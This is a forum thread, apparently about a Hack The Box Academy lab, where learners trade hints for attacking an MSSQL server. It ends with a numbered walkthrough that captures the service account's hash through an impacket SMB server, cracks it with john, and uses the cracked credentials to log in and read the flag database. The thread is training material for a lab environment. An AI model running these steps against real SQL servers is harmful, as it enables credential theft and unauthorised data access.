Attacking Common Services- Attacking SQL Databases

hey y’all,

Need some help with the first question in the Attacking SQL database.
I have no clue how to get the mssql password. I have looked at all the db’s and I do not have access to the flagDB or hmaildb. Have no clue how to move forward on this section. Any help would be appreciated.

Try one of the approaches mentioned in the text in that chapter. It has to do with undocumented stored procedures. Try those and I’m sure you’ll figure it out.

Hey man, thanks for that. Let me try that. I had to take a quick brake.

I have the service account password but doesn’t seem to allow login. They can’t be impersonated either. I’m lost what to do, here.

image837×599 87.8 KB

Try sqsh (doesn’t work on pwnbox so VPN on own Liux machine), that did the trick for me. I always hate it when you get sidetracked with unclear ‘execution’ things but if you have the right password it should work.

Bro, I am lost haha… I think i am over looking something here. Would yall be able to give me another nugget? I have tried looking through the db however, I am unable to find the users table. However, I have found

• 1> SELECT * FROM syslogins
• 2> go
  and
• SELECT name, password FROM master…syslogins
• go

however, I am unable to find much of use. I have tried enum the other ports and I might be missing something throughout the ports.

I will be looking into RDP. Hopefully I find something?

I tried logging in with sqsh using the right credentials of mssqlsvc but its not working.

Hello, I`m same as you… Looking through forums and searching for totally stuck at the moment…

yeah it’s not as intuitive but there is a GUI option. you just right click on what you want and there should be an option

Thanks!! I got it

gui option for what?

For anyone still working on this, here are notes and hints (uncover as you progress).

NOTE:

• I managed to login with the htbdbuser only with the sqlcmd tool

HINT:

NOTE:

• If you have password for mssqlsvc – I had to connect remotely from VPN because the sqsh is not working properly on the pwnbox. So establish VPN and try it form your PC.

HINT:

GL!

Check impacket mssqlclient, esp the command help once you’re connected. It has some nice added functionalities / shortcuts for most of the techniques taught in this chapter (easy activation of xp_cmdshell, enumeration of users that you can impersonate, links, etc.).

Great tool.

Read this if you are using Impacket’s mssqlclient and can’t login as the mssqlsvc user and are getting the error “Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.”

Guys, when you connect to mssql CLI there’s one option to authenticate

Hello, i tried all approaches can’t find the hash, any hint please ? thanks

follow these steps

1. sqlcmd -S Target_Ip -U julio -P
2. note table names
3. start
   sudo impacket-smbserver share ./ -smb2support
4. try any step from “Capture MSSQL Service Hash Section”
5. note don’t forget enter ip of Attack box in 4th step
6. copy hash to text file and crack it ( note start copying from "mss… to …000)
7. crack it using john :- john Your hash file (leave wordlist to default )
8. now login with the creds you found using mssqlclient.py -p 1433 userwhich_You_found@target_ip -windows-auth
9. select name from master.dbo.sysdatabases
10. use flagdb
11. SELECT * FROM flagdb.INFORMATION_SCHEMA.TABLES
12. select * from tb_flag
    that’s it .
    Thank you for reading this, I hope it helped.

you couldn’t give better suggestions.